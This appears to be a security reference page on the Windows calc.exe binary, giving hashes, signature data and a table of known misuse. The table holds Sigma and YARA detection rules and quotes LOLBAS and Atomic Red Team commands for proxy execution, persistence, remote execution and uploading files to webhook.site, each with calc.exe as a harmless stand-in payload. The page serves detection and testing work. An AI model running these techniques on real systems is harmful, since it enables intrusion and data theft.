calc.exe
- File Path: C:\Windows\system32\calc.exe
- Description: Windows Calculator
Hashes
Type | Hash |
---|---|
MD5 | 4673C27FDCAB6166578A1863060D83FF |
SHA1 | 4A2446EE9651D90AC6C5613BDDF416DF197F6401 |
SHA256 | B093FD472121CDA0BBB1E0079479DE36325F1B2FAA7FDA54C4F757565572FE1D |
SHA384 | FDD4BB991CD9FB460DE2A77B1EC9142988AB256604102F04AA775C4E274B94FD0A7B467FCADB1A5A547C3BCEB8A88ED0 |
SHA512 | D570BA4428BC5085B7CADD56A25233CAB810DCEB17D8873D4B458A4E7FA565201B45525F252489B4571ECEC24333BA216907FC849992A74572ADE03E61F00F3E |
SSDEEP | 384:ju/51mFSDUiIMbPWUrytejUSFqpy7LJcGWSAYWSiiiiiiiiiiiiiiiiiiiiiiiik:juiQI0OUfjUUevb |
Runtime Data
Child Processes: win32calc.exe
Signature
- Status: Signature verified.
- Serial: 33000000BCE120FDD27CC8EE930000000000BC
- Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: CALC.EXE
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.14393.0 (rs1_release.160715-1616)
- Product Version: 10.0.14393.0
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
File Similarity (ssdeep match)
File | Score |
---|---|
C:\Windows\SysWOW64\calc.exe | 32 |
Possible Misuse
The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | proc_creation_win_susp_calc.yml | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion | DRL 1.0 |
sigma | proc_creation_win_susp_calc.yml | CommandLine\|contains: '\calc.exe ' | DRL 1.0 |
sigma | proc_creation_win_susp_calc.yml | Image\|endswith: '\calc.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf | DRL 1.0 |
sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\calc.exe' | DRL 1.0 |
LOLBAS | Explorer.yml | - Command: explorer.exe calc.exe | |
LOLBAS | Explorer.yml | Description: 'Executes calc.exe as a subprocess of explorer.exe.' | |
LOLBAS | Gpup.yml | - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe | |
LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe System calc.exe | |
LOLBAS | Nvudisp.yml | Description: Execute calc.exe as a subprocess. | |
LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe System calc.exe | |
LOLBAS | Nvuhda6.yml | Description: Execute calc.exe as a subprocess. | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe KillApp calc.exe | |
LOLBAS | Usbinst.yml | Description: Execute calc.exe through DefaultInstall Section Directive in INF file. | |
LOLBAS | Bash.yml | - Command: bash.exe -c calc.exe | |
LOLBAS | Bash.yml | Description: Executes calc.exe from bash.exe | |
LOLBAS | ConfigSecurityPolicy.yml | - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile | |
LOLBAS | DataSvcUtil.yml | - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile | |
LOLBAS | Diskshadow.yml | - Command: diskshadow> exec calc.exe | |
LOLBAS | Explorer.yml | - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" | |
LOLBAS | Explorer.yml | Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe | |
LOLBAS | Extrac32.yml | - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe | |
LOLBAS | Extrac32.yml | Description: Command for copying calc.exe to another folder | |
LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | |
LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | |
LOLBAS | Ftp.yml | - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt | |
LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe | |
LOLBAS | Hh.yml | Description: Executes calc.exe with HTML Help. | |
LOLBAS | Pcalua.yml | - Command: pcalua.exe -a calc.exe | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | |
LOLBAS | Scriptrunner.yml | - Command: Scriptrunner.exe -appvscript calc.exe | |
LOLBAS | Scriptrunner.yml | Description: Executes calc.exe | |
LOLBAS | Ttdinject.yml | - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" | |
LOLBAS | Ttdinject.yml | - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" | |
LOLBAS | Tttracer.yml | - Command: tttracer.exe C:\windows\system32\calc.exe | |
LOLBAS | Wlrmdr.yml | - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" | |
LOLBAS | Wlrmdr.yml | Description: Execute calc.exe with wlrmdr.exe as parent process | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe | |
LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe | |
LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe | |
LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf | |
LOLBAS | Setupapi.yml | - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe | |
LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe | |
LOLBAS | Manage-bde.yml | - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf | |
LOLBAS | Appvlp.yml | - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" | |
LOLBAS | Sqltoolsps.yml | - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe | |
LOLBAS | Vsjitdebugger.yml | - Command: Vsjitdebugger.exe calc.exe | |
LOLBAS | Vsjitdebugger.yml | Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. | |
LOLBAS | Wsl.yml | - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe | |
LOLBAS | Wsl.yml | Description: Executes calc.exe from wsl.exe | |
atomic-red-team | problem_report.md | e.g. The atomic test executes and calc.exe is launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1021.003.md | Upon successful execution, cmd will spawn calc.exe on a remote computer. | MIT License. © 2018 Red Canary |
atomic-red-team | T1021.003.md | [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") | MIT License. © 2018 Red Canary |
atomic-red-team | T1027.004.md | \| input_file \| C# code that launches calc.exe from a hidden cmd.exe Window \| Path \| PathToAtomicsFolder\T1027.004\src\calc.cs\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | \| exe_path \| path to exe to use when creating masquerading files \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | $Action = New-ScheduledTaskAction -Execute "calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1106.md | Execute program by leveraging Win32 APIs. By default, this will launch calc.exe from the command prompt. | MIT License. © 2018 Red Canary |
atomic-red-team | T1112.md | \| new_executable \| New executable to run on startup instead of Windows Defender \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | \| executable \| name of executable \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | \| executable \| name of executable/file to decode \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | Upon execution, calc.exe should open | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | \| payload_path \| Path to payload \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | \| process \| Process to execute \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | Upon execution calc.exe will be opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | $macrocode = " Open "#{bat_path} " For Output As #1n Write #1, "calc.exe" n Close #1n a = Shell( "cmd.exe /c $bat_path ", vbNormalFocus) n" | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | and pull down the script and execute it. By default the payload will execute calc.exe on the system. | MIT License. © 2018 Red Canary |
atomic-red-team | T1216.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1216.md | \| command_to_execute \| A command to execute. \| Path \| %windir%\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | \| powershell_code \| PowerShell code to execute \| String \| Start-Process calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Upon execution calc.exe will open | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.002.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | \| command_to_execute \| Command for rundll32.exe to execute \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Upon successful execution, Calc.exe will spawn. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.012.md | \| target_binary \| Binary To Attach To \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.013.md | Appends a start process cmdlet to the current user's powershell profile that points to a malicious executable. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.013.md | \| exe_path \| Path the malicious executable \| Path \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | $Target = "C:\Windows\System32\calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.009.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.009.md | echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | {DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" } | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | 9. DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.md | This module extracts a binary (calc.exe) from inside of another binary. | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.003.md | Upon execution a hidden PowerShell window will launch calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.003.md | \| powershell_command \| Command to launch calc.exe from a hidden PowerShell Window \| String \| powershell.exe -WindowStyle hidden calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1569.002.md | Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). | MIT License. © 2018 Red Canary |
atomic-red-team | T1569.002.md | #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | Upon execution, calc.exe will be opened. | MIT License. © 2018 Red Canary |
signature-base | thor-webshells.yar | $s7 = """%windir%\\calc.exe"")" | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020-2021 Strontic.